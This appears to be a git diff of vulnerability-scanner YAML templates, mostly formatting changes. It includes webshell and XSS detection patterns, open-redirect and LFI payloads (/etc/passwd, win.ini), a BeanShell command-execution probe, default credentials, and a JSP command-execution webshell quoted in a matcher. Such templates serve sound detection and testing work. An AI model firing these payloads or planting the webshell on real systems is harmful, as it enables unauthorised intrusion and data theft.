name: Include file regex: - "(?i)\\.inc" + - type: regex name: XML file regex: - "(?i)\\.xml" + - type: regex name: Old file regex: - "(?i)\\.old" + - type: regex name: Log file regex: - "(?i)\\.log" + - type: regex name: Java file regex: - "(?i)\\.java" + - type: regex name: SQL dump file regex: - "(?i)\\.sql" + - type: regex name: Excel file regex: - "(?i)(\\.xls|\\.xlsx|\\.csv)" + - type: regex name: Certificate file regex: - "(?i)(\\.cer|\\.crt|\\.p7b)" + - type: regex name: Java key storte regex: - "(?i)\\.jks" + - type: regex name: KDE Wallet Manager database file regex: - "(?i)\\.kwallet" + - type: regex name: Little Snitch firewall configuration file regex: - "(?i)\\.xpl" + - type: regex name: Microsoft BitLocker Trusted Platform Module password file regex: - "(?i)\\.tpm" + - type: regex name: Microsoft BitLocker recovery key file regex: - "(?i)\\.bek" + - type: regex name: Microsoft SQL database file regex: - "(?i)\\.mdf" + - type: regex name: Microsoft SQL server compact database file regex: - "(?i)\\.sdf" + - type: regex name: Network traffic capture file regex: - "(?i)\\.pcap" + - type: regex name: OpenVPN client configuration file regex: - "(?i)\\.ovpn" + - type: regex name: PDF file regex: - "(?i)\\.pdf" + - type: regex name: PHP file regex: - "(?i)\\.pcap" + - type: regex name: Password Safe database file regex: - "(?i)\\.psafe3" + - type: regex name: Potential configuration file regex: - "(?i)\\.yml" + - type: regex name: Potential cryptographic key bundle regex: - "(?i)(\\.pkcs12|\\.p12|\\.pfx|\\.asc|\\.pem)" + - type: regex name: Potential private key regex: - "(?i)otr.private_key" + - type: regex name: Presentation file regex: - "(?i)(\\.ppt|\\.pptx)" + - type: regex name: Python file regex: - "(?i)\\.py" + - type: regex name: Remote Desktop connection file regex: - "(?i)\\.rdp" + - type: regex name: Ruby On Rails file regex: - "(?i)\\.rb" + - type: regex name: SQLite database file regex: - "(?i)\\.sqlite|\\.sqlitedb" + - type: regex name: SQLite3 database file regex: - "(?i)\\.sqlite3" + - type: regex name: Sequel Pro MySQL database manager bookmark file regex: - "(?i)\\.plist" + - type: regex name: Shell configuration file regex: - "(?i)(\\.exports|\\.functions|\\.extra)" + - type: regex name: Temporary file regex: - "(?i)\\.tmp" + - type: regex name: Terraform variable config file regex: - "(?i)\\.tfvars" + - type: regex name: Text file regex: - "(?i)\\.txt" + - type: regex name: Tunnelblick VPN configuration file regex: - "(?i)\\.tblk" + - type: regex name: Windows BitLocker full volume encrypted data file regex: diff --git a/file/webshell/asp-webshell.yaml b/file/webshell/asp-webshell.yaml index cef1e2c90c..ccf6743453 100644 --- a/file/webshell/asp-webshell.yaml +++ b/file/webshell/asp-webshell.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: asp,aspx,file,webshell - file: - extensions: - asp @@ -30,4 +29,4 @@ file: - '(?i)ExecuteStatement' - '(?i)cmd.exe' - '(?i)mmshell' - - '(?i)GetCmd' \ No newline at end of file + - '(?i)GetCmd' diff --git a/file/webshell/jsp-webshell.yaml b/file/webshell/jsp-webshell.yaml index 3396019601..eb74c83491 100644 --- a/file/webshell/jsp-webshell.yaml +++ b/file/webshell/jsp-webshell.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: jsp,java,jspx,webshell,file - file: - extensions: - jsp @@ -25,4 +24,4 @@ file: - '(?i)cmd.exe' - '(?i)/bin/sh' - '(?i)/bin/bash' - - '(?i)exeCmd' \ No newline at end of file + - '(?i)exeCmd' diff --git a/file/webshell/php-webshell.yaml b/file/webshell/php-webshell.yaml index 747b8a97bd..a8c6f6bc40 100644 --- a/file/webshell/php-webshell.yaml +++ b/file/webshell/php-webshell.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: php,file,webshell - file: - extensions: - php @@ -30,4 +29,4 @@ file: - '65786563' # exec - '(?i)\$\w+\(\$_(GET|POST|COOKIE|REQUEST)' - '(?i)b4tm4n' - - '(?i)cmdshell' \ No newline at end of file + - '(?i)cmdshell' diff --git a/file/xss/dom-xss.yaml b/file/xss/dom-xss.yaml index e100e000a0..85a4122380 100644 --- a/file/xss/dom-xss.yaml +++ b/file/xss/dom-xss.yaml @@ -12,7 +12,6 @@ info: cvss-score: 7.2 cwe-id: CWE-79 tags: xss,file - file: - extensions: - js @@ -43,10 +42,11 @@ file: - 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?' - 'iframe(\.srcdoc|\.src)' - 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)' + - type: regex name: source part: body regex: - 'location(\.href|\.hash|\.search|\.pathname)?' - 'window\.name' - - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' \ No newline at end of file + - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' diff --git a/headless/dvwa-headless-automatic-login.yaml b/headless/dvwa-headless-automatic-login.yaml index bd48c62f5e..c35b2076b8 100644 --- a/headless/dvwa-headless-automatic-login.yaml +++ b/headless/dvwa-headless-automatic-login.yaml @@ -5,37 +5,45 @@ info: author: pdteam severity: high tags: headless,dvwa - headless: - steps: - args: url: "{{BaseURL}}/login.php" action: navigate + - action: waitload + - args: by: x xpath: /html/body/div/div[2]/form/fieldset/input action: click + - action: waitload + - args: by: x value: admin xpath: /html/body/div/div[2]/form/fieldset/input action: text + - args: by: x xpath: /html/body/div/div[2]/form/fieldset/input[2] action: click + - action: waitload + - args: by: x value: password xpath: /html/body/div/div[2]/form/fieldset/input[2] action: text + - args: by: x xpath: /html/body/div/div[2]/form/fieldset/p/input action: click + - action: waitload matchers-condition: or diff --git a/headless/extract-urls.yaml b/headless/extract-urls.yaml index 2d7a1060d9..998d6d68ab 100644 --- a/headless/extract-urls.yaml +++ b/headless/extract-urls.yaml @@ -5,7 +5,6 @@ info: author: dwisiswant0 severity: info tags: headless,extractor - headless: - steps: - args: diff --git a/headless/headless-open-redirect.yaml b/headless/headless-open-redirect.yaml index 7291cda50a..cfdd382897 100644 --- a/headless/headless-open-redirect.yaml +++ b/headless/headless-open-redirect.yaml @@ -11,14 +11,13 @@ info: cvss-score: 6.1 cwe-id: CWE-601 tags: redirect,generic,headless - headless: - steps: - args: url: '{{BaseURL}}/{{redirect}}' action: navigate - - action: waitload + - action: waitload payloads: redirect: - '%0a/oast.live/' @@ -112,7 +111,6 @@ headless: - 'cgi-bin/redirect.cgi?oast.live' - 'out?oast.live' - 'login?to=http://oast.live' - stop-at-first-match: true matchers: - type: word diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml index 02abe08509..4d747b62f0 100644 --- a/headless/prototype-pollution-check.yaml +++ b/headless/prototype-pollution-check.yaml @@ -5,7 +5,6 @@ info: author: pdteam severity: medium tags: headless - headless: - steps: - args: @@ -21,12 +20,12 @@ headless: () => { return window.vulnerableprop } - matchers: - type: word part: extract words: - "polluted" + - steps: - args: url: "{{BaseURL}}?constructor.prototype.vulnerableprop=polluted#constructor.prototype.vulnerableprop=polluted" @@ -41,7 +40,6 @@ headless: () => { return window.vulnerableprop } - matchers: - type: word part: extract2 @@ -62,12 +60,12 @@ headless: () => { return window.vulnerableprop } - matchers: - type: word part: extract3 words: - "polluted" + - steps: - args: url: "{{BaseURL}}?__proto__.vulnerableprop=polluted" @@ -82,7 +80,6 @@ headless: () => { return window.vulnerableprop } - matchers: - type: word part: extract4 diff --git a/headless/screenshot.yaml b/headless/screenshot.yaml index 6fbd650c75..d50030712e 100644 --- a/headless/screenshot.yaml +++ b/headless/screenshot.yaml @@ -6,11 +6,9 @@ info: severity: info description: Takes a screenshot of the specified URLS. tags: headless,screenshot - variables: filename: '{{replace(BaseURL,"/","_")}}' dir: "screenshots" - headless: - steps: - action: setheader @@ -24,8 +22,9 @@ headless: url: "{{BaseURL}}" - action: waitload + - action: screenshot args: fullpage: "true" mkdir: "true" - to: "{{dir}}/{{filename}}" \ No newline at end of file + to: "{{dir}}/{{filename}}" diff --git a/headless/technologies/sap-spartacus.yaml b/headless/technologies/sap-spartacus.yaml index b72bda5790..1085fd5a9a 100644 --- a/headless/technologies/sap-spartacus.yaml +++ b/headless/technologies/sap-spartacus.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: tech,sap,hybris,angular,spartacus,headless - headless: - steps: - action: navigate diff --git a/http/cnvd/2017/CNVD-2017-03561.yaml b/http/cnvd/2017/CNVD-2017-03561.yaml index 0a443aef6e..3f9d674fdf 100644 --- a/http/cnvd/2017/CNVD-2017-03561.yaml +++ b/http/cnvd/2017/CNVD-2017-03561.yaml @@ -10,11 +10,10 @@ info: - https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md - https://reconshell.com/vulnerability-research-list/ metadata: - max-request: 2 verified: true + max-request: 2 fofa-query: app="泛微-eMobile" tags: cnvd,cnvd2017,emobile,ognl,fanwei - variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" @@ -27,6 +26,7 @@ http: - "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cnvd/2018/CNVD-2018-13393.yaml b/http/cnvd/2018/CNVD-2018-13393.yaml index efb9edca21..0c520a218b 100644 --- a/http/cnvd/2018/CNVD-2018-13393.yaml +++ b/http/cnvd/2018/CNVD-2018-13393.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: metinfo,cnvd,cvnd2018,lfi metadata: max-request: 1 + tags: metinfo,cnvd,cvnd2018,lfi http: - method: GET @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -29,4 +30,4 @@ http: words: - "<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("
" +excuteCmd(request.getParameter("{{randstr}}")) + "
");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce - - | GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1 Host: {{Hostname}} @@ -51,4 +50,4 @@ http: - 'status_code_2 == 200' - 'contains(body_1, "htmoffice operate")' - 'contains(body_2, "Windows IP")' - condition: and \ No newline at end of file + condition: and diff --git a/http/cnvd/2019/CNVD-2019-32204.yaml b/http/cnvd/2019/CNVD-2019-32204.yaml index e234dda155..8c9e06e04c 100644 --- a/http/cnvd/2019/CNVD-2019-32204.yaml +++ b/http/cnvd/2019/CNVD-2019-32204.yaml @@ -9,11 +9,11 @@ info: - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: fanwei,cnvd,cnvd2019,rce metadata: max-request: 1 + tags: fanwei,cnvd,cnvd2019,rce http: - raw: @@ -27,4 +27,4 @@ http: matchers: - type: regex regex: - - "root:.*:0:0:" \ No newline at end of file + - "root:.*:0:0:" diff --git a/http/cnvd/2020/CNVD-2020-23735.yaml b/http/cnvd/2020/CNVD-2020-23735.yaml index c833ebe63b..795ca5dd07 100644 --- a/http/cnvd/2020/CNVD-2020-23735.yaml +++ b/http/cnvd/2020/CNVD-2020-23735.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: xunchi,lfi,cnvd,cnvd2020 metadata: max-request: 1 + tags: xunchi,lfi,cnvd,cnvd2020 http: - method: GET @@ -31,4 +31,4 @@ http: words: - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" - "display_errors" - condition: and \ No newline at end of file + condition: and diff --git a/http/cnvd/2020/CNVD-2020-26585.yaml b/http/cnvd/2020/CNVD-2020-26585.yaml index d7967d4caf..5ab974012c 100644 --- a/http/cnvd/2020/CNVD-2020-26585.yaml +++ b/http/cnvd/2020/CNVD-2020-26585.yaml @@ -15,11 +15,10 @@ info: cvss-score: 9.9 cwe-id: CWE-434 metadata: - max-request: 2 verified: true + max-request: 2 fofa-query: app="ShowDoc" - tags: cnvd,cnvd2020,showdoc,fileupload - + tags: cnvd,cnvd2020,showdoc,fileupload,intrusive variables: str1: "{{randstr}}" @@ -36,7 +35,6 @@ http: {{str1}} ----------------------------835846770881083140190633-- - - | GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1 Host: {{Hostname}} @@ -63,4 +61,4 @@ http: group: 2 regex: - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)' - internal: true \ No newline at end of file + internal: true diff --git a/http/cnvd/2020/CNVD-2020-46552.yaml b/http/cnvd/2020/CNVD-2020-46552.yaml index cf9f97bd98..e578dc0118 100644 --- a/http/cnvd/2020/CNVD-2020-46552.yaml +++ b/http/cnvd/2020/CNVD-2020-46552.yaml @@ -11,11 +11,11 @@ info: - https://cn-sec.com/archives/721509.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: cnvd,cnvd2020,sangfor,rce metadata: max-request: 1 + tags: cnvd,cnvd2020,sangfor,rce http: - method: GET @@ -29,4 +29,4 @@ http: - 'contains(body, "$strip_slashes($host)")' - 'contains(body, "Log Helper")' - 'status_code == 200' - condition: and \ No newline at end of file + condition: and diff --git a/http/cnvd/2020/CNVD-2020-56167.yaml b/http/cnvd/2020/CNVD-2020-56167.yaml index f4ee73c3a6..e8ac9dc2c9 100644 --- a/http/cnvd/2020/CNVD-2020-56167.yaml +++ b/http/cnvd/2020/CNVD-2020-56167.yaml @@ -8,16 +8,18 @@ info: reference: - https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 - https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner - tags: ruijie,default-login,cnvd,cnvd2020 metadata: max-request: 1 + tags: ruijie,default-login,cnvd,cnvd2020 http: - method: POST path: - "{{BaseURL}}/WEB_VMS/LEVEL15/" + headers: Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. matchers-condition: and @@ -31,4 +33,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cnvd/2020/CNVD-2020-62422.yaml b/http/cnvd/2020/CNVD-2020-62422.yaml index 64ae3943fe..f7576ef080 100644 --- a/http/cnvd/2020/CNVD-2020-62422.yaml +++ b/http/cnvd/2020/CNVD-2020-62422.yaml @@ -7,9 +7,9 @@ info: description: Seeyon is vulnerable to local file inclusion. reference: - https://blog.csdn.net/m0_46257936/article/details/113150699 - tags: lfi,cnvd,cnvd2020,seeyon metadata: max-request: 1 + tags: lfi,cnvd,cnvd2020,seeyon http: - method: GET @@ -32,4 +32,4 @@ http: part: body words: - "ctpDataSource.password" - condition: and \ No newline at end of file + condition: and diff --git a/http/cnvd/2020/CNVD-2020-63964.yaml b/http/cnvd/2020/CNVD-2020-63964.yaml index 44a87bdbb5..dd3310a612 100644 --- a/http/cnvd/2020/CNVD-2020-63964.yaml +++ b/http/cnvd/2020/CNVD-2020-63964.yaml @@ -10,8 +10,8 @@ info: - https://cn-sec.com/archives/1798444.html metadata: max-request: 1 - fofa-query: jshERP-boot shodan-query: http.favicon.hash:-1298131932 + fofa-query: jshERP-boot tags: cnvd,cnvd2022,jsherp,disclosure http: diff --git a/http/cnvd/2020/CNVD-2020-67113.yaml b/http/cnvd/2020/CNVD-2020-67113.yaml index 8058ec7fb9..765638ee3a 100644 --- a/http/cnvd/2020/CNVD-2020-67113.yaml +++ b/http/cnvd/2020/CNVD-2020-67113.yaml @@ -12,8 +12,8 @@ info: cvss-score: 5.3 cwe-id: CWE-425 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"H5S CONSOLE" tags: cnvd,cnvd2020,h5s,unauth,h5sconsole @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/api/v1/GetDevice" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -47,4 +48,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cnvd/2020/CNVD-2020-68596.yaml b/http/cnvd/2020/CNVD-2020-68596.yaml index 80e49abf46..27db456ad0 100644 --- a/http/cnvd/2020/CNVD-2020-68596.yaml +++ b/http/cnvd/2020/CNVD-2020-68596.yaml @@ -3,17 +3,17 @@ id: CNVD-2020-68596 info: name: WeiPHP 5.0 - Path Traversal author: pikpikcu - description: WeiPHP 5.0 is susceptible to directory traversal attacks. severity: high + description: WeiPHP 5.0 is susceptible to directory traversal attacks. reference: - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: weiphp,lfi,cnvd,cnvd2020 metadata: max-request: 3 + tags: weiphp,lfi,cnvd,cnvd2020 http: - raw: @@ -26,8 +26,6 @@ http: - | GET /public/index.php/home/file/user_pics HTTP/1.1 Host: {{Hostname}} - - - | GET {{endpoint}} HTTP/1.1 Host: {{Hostname}} @@ -39,7 +37,6 @@ http: internal: true regex: - '/public/uploads/picture/(.*.jpg)' - matchers: - type: word part: body @@ -47,4 +44,4 @@ http: - https://weiphp.cn - WeiPHP - DB_PREFIX - condition: and \ No newline at end of file + condition: and diff --git a/http/cnvd/2021/CNVD-2021-01931.yaml b/http/cnvd/2021/CNVD-2021-01931.yaml index 8b5d29c8d2..68b390db47 100644 --- a/http/cnvd/2021/CNVD-2021-01931.yaml +++ b/http/cnvd/2021/CNVD-2021-01931.yaml @@ -7,13 +7,13 @@ info: description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system. reference: - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ - tags: ruoyi,lfi,cnvd,cnvd2021 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 metadata: max-request: 2 + tags: ruoyi,lfi,cnvd,cnvd2021 http: - method: GET @@ -34,4 +34,4 @@ http: - "bit app support" - "fonts" - "extensions" - condition: and \ No newline at end of file + condition: and diff --git a/http/cnvd/2021/CNVD-2021-09650.yaml b/http/cnvd/2021/CNVD-2021-09650.yaml index f6859c6b29..70cfacbeef 100644 --- a/http/cnvd/2021/CNVD-2021-09650.yaml +++ b/http/cnvd/2021/CNVD-2021-09650.yaml @@ -11,11 +11,11 @@ info: - https://www.ruijienetworks.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: ruijie,cnvd,cnvd2021,rce metadata: max-request: 1 + tags: ruijie,cnvd,cnvd2021,rce http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-10543.yaml b/http/cnvd/2021/CNVD-2021-10543.yaml index c41bd8c499..c4e8cefbfb 100644 --- a/http/cnvd/2021/CNVD-2021-10543.yaml +++ b/http/cnvd/2021/CNVD-2021-10543.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: config,exposure,cnvd,cnvd2021 metadata: max-request: 1 + tags: config,exposure,cnvd,cnvd2021 http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-15822.yaml b/http/cnvd/2021/CNVD-2021-15822.yaml index f9e2dffec5..6909f3f8a0 100644 --- a/http/cnvd/2021/CNVD-2021-15822.yaml +++ b/http/cnvd/2021/CNVD-2021-15822.yaml @@ -9,8 +9,8 @@ info: reference: - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"ShopXO企业级B2C电商系统提供商" fofa-query: app="ShopXO企业级B2C电商系统提供商" tags: shopxo,lfi,cnvd,cnvd2021 diff --git a/http/cnvd/2021/CNVD-2021-15824.yaml b/http/cnvd/2021/CNVD-2021-15824.yaml index d085e9ce49..30b675f2c2 100644 --- a/http/cnvd/2021/CNVD-2021-15824.yaml +++ b/http/cnvd/2021/CNVD-2021-15824.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: empirecms,cnvd,cnvd2021,xss,domxss metadata: max-request: 1 + tags: empirecms,cnvd,cnvd2021,xss,domxss http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-17369.yaml b/http/cnvd/2021/CNVD-2021-17369.yaml index 703ccbc50c..5e8a899ce1 100644 --- a/http/cnvd/2021/CNVD-2021-17369.yaml +++ b/http/cnvd/2021/CNVD-2021-17369.yaml @@ -11,14 +11,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: ruijie,disclosure,cnvd,cnvd2021 metadata: max-request: 1 + tags: ruijie,disclosure,cnvd,cnvd2021 http: - method: GET path: - "{{BaseURL}}/web/xml/webuser-auth.xml" + headers: Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest diff --git a/http/cnvd/2021/CNVD-2021-26422.yaml b/http/cnvd/2021/CNVD-2021-26422.yaml index ef839cda21..eafbf22ab4 100644 --- a/http/cnvd/2021/CNVD-2021-26422.yaml +++ b/http/cnvd/2021/CNVD-2021-26422.yaml @@ -10,11 +10,11 @@ info: - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: eyoumail,rce,cnvd,cnvd2021 metadata: max-request: 1 + tags: eyoumail,rce,cnvd,cnvd2021 http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-28277.yaml b/http/cnvd/2021/CNVD-2021-28277.yaml index d0418eaef6..5f9d790c83 100644 --- a/http/cnvd/2021/CNVD-2021-28277.yaml +++ b/http/cnvd/2021/CNVD-2021-28277.yaml @@ -8,13 +8,13 @@ info: reference: - https://www.aisoutu.com/a/1432457 - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw - metadata: - max-request: 2 - fofa-query: app="Landray OA system" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 + metadata: + max-request: 2 + fofa-query: app="Landray OA system" tags: landray,lfi,cnvd,cnvd2021 http: @@ -26,7 +26,6 @@ http: Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///etc/passwd"}} - - | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} @@ -36,9 +35,9 @@ http: var={"body":{"file":"file:///c://windows/win.ini"}} stop-at-first-match: true + matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cnvd/2021/CNVD-2021-30167.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml index a8c42f9888..a74f14fb41 100644 --- a/http/cnvd/2021/CNVD-2021-30167.yaml +++ b/http/cnvd/2021/CNVD-2021-30167.yaml @@ -11,11 +11,11 @@ info: - https://chowdera.com/2022/03/202203110138271510.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: cnvd,cnvd2021,beanshell,rce,yonyou metadata: max-request: 2 + tags: cnvd,cnvd2021,beanshell,rce,yonyou http: - raw: @@ -25,7 +25,6 @@ http: Content-Type: application/x-www-form-urlencoded bsh.script=exec("id"); - - | #windows POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} diff --git a/http/cnvd/2021/CNVD-2021-32799.yaml b/http/cnvd/2021/CNVD-2021-32799.yaml index 3b5b01c8ce..b5f214ce1a 100644 --- a/http/cnvd/2021/CNVD-2021-32799.yaml +++ b/http/cnvd/2021/CNVD-2021-32799.yaml @@ -9,9 +9,9 @@ info: - https://www.cnvd.org.cn/patchInfo/show/270651 - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/CNVD/2021/CNVD-2021-32799.yaml metadata: - fofa-query: app="360新天擎" verified: true max-request: 1 + fofa-query: app="360新天擎" tags: cnvd,cnvd2021,360,xintianqing,sqli http: diff --git a/http/cnvd/2021/CNVD-2021-33202.yaml b/http/cnvd/2021/CNVD-2021-33202.yaml index 2dbe555ee6..81a9312b60 100755 --- a/http/cnvd/2021/CNVD-2021-33202.yaml +++ b/http/cnvd/2021/CNVD-2021-33202.yaml @@ -10,11 +10,10 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md - https://www.cnblogs.com/0day-li/p/14637680.html metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="泛微-协同办公OA" tags: cnvd,cnvd2021,e-cology,sqli - variables: num: "999999999" @@ -33,4 +32,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cnvd/2021/CNVD-2021-41972.yaml b/http/cnvd/2021/CNVD-2021-41972.yaml index 53393e1c4f..b0f13ab27f 100644 --- a/http/cnvd/2021/CNVD-2021-41972.yaml +++ b/http/cnvd/2021/CNVD-2021-41972.yaml @@ -10,12 +10,11 @@ info: - https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972 - https://github.com/hktalent/scan4all/blob/main/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt metadata: - max-request: 1 verified: true - fofa-query: body="Login @ Reporter" + max-request: 1 shodan-query: http.favicon.hash:-1595726841 + fofa-query: body="Login @ Reporter" tags: cnvd,cnvd2021,acenet,acereporter,lfi - variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cnvd/2021/CNVD-2021-43984.yaml b/http/cnvd/2021/CNVD-2021-43984.yaml index f1b631ec1f..b5754a5391 100644 --- a/http/cnvd/2021/CNVD-2021-43984.yaml +++ b/http/cnvd/2021/CNVD-2021-43984.yaml @@ -10,8 +10,8 @@ info: - https://www.cnvd.org.cn/flaw/show/CNVD-2021-43984 - https://github.com/chaitin/xray/blob/master/pocs/mpsec-isg1000-file-read.yml metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: "迈普通信技术股份有限公司" tags: cnvd,cnvd2021,mpsec,maipu,lfi,isg diff --git a/http/cnvd/2021/CNVD-2021-49104.yaml b/http/cnvd/2021/CNVD-2021-49104.yaml index 554a8c74b6..c960829dfd 100644 --- a/http/cnvd/2021/CNVD-2021-49104.yaml +++ b/http/cnvd/2021/CNVD-2021-49104.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: critical description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker. + remediation: Pan Wei has released an update to resolve this vulnerability. reference: - https://chowdera.com/2021/12/202112200602130067.html - http://v10.e-office.cn @@ -12,10 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L cvss-score: 9.9 cwe-id: CWE-434 - remediation: Pan Wei has released an update to resolve this vulnerability. - tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive metadata: max-request: 2 + tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive http: - raw: @@ -31,7 +31,6 @@ http: --e64bdf16c554bbc109cecef6451c26a4-- - - | GET /images/logo/logo-eoffice.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/cnvd/2022/CNVD-2022-03672.yaml 